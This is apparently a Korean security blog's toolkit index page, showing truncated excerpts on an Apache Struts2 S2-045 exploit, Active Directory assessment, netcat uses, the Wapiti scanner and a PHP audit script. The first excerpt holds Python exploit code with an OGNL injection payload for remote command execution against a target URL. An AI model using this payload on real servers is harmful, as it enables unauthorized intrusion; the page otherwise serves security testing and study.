보안 툴킷

(*) 출처: https://github.com/rapid7/metasploit-framework/issues/8064 * usage: $python struts2_S2-045.py <URL> <CMD> $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action “ls -al” [ struts2_S2-045.py – Python Code ] #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = “%{(#_=’multipart/form-data’).” payload += “(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).” payload += “(#_memberAccess?” payload += “(#_memberAccess=#dm):” payload += “((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).” payload += “(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).” payload += “(#ognlUtil.getExcludedPackageNames().clear()).” payload += […]

– Active Directory는 조직내의 자원에 대한 접근통제를 위해 기업이나 기관의 규모와 상관없이 많이 사용되고 있습니다.– 그러나 Active Directory의 서비스 특성을 고려한 보안진단을 하는 곳은 아직까지 드문것으로 보입니다.– Active Directory 보안진단의 중요 포인트는 Domain Controller, Group Policy, User Account, Event Log 등이 있습니다.– 최근 글로벌 조직의 Active Directory를 운영하는 고객사에 대한 취약점 진단에는 Ad User 계정을

* telnet 접속 * 서버간 채팅 * IPv6로 접속 (-6: IPv6, -4: IPv4) * copying a file * Hard Drives & partition 복제 * port scanning * port range에 “quit”문자를 보내서 응답(버전정보) 확인 * 간단한 web-page(somepage.html) 서비스

Wapiti allows you to audit the security of your web applications.It performs “black-box” scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data.Once it gets this list, Wapiti acts like a fuzzer, injecting payloads

php_aduit_script.php <?php   /** * PHP Security Check Script * http://php-security-audit.com/ * * This security check script will evaluate the PHP runtime environment * for your configuration to determine whether any improvements could be * made to your configuration. * * * * * * * * * * Revision History * * 2009-05-08 –